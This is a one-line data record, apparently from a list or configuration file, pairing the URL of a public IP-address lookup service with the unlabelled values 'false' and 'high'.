http://api.ipify.org/ false high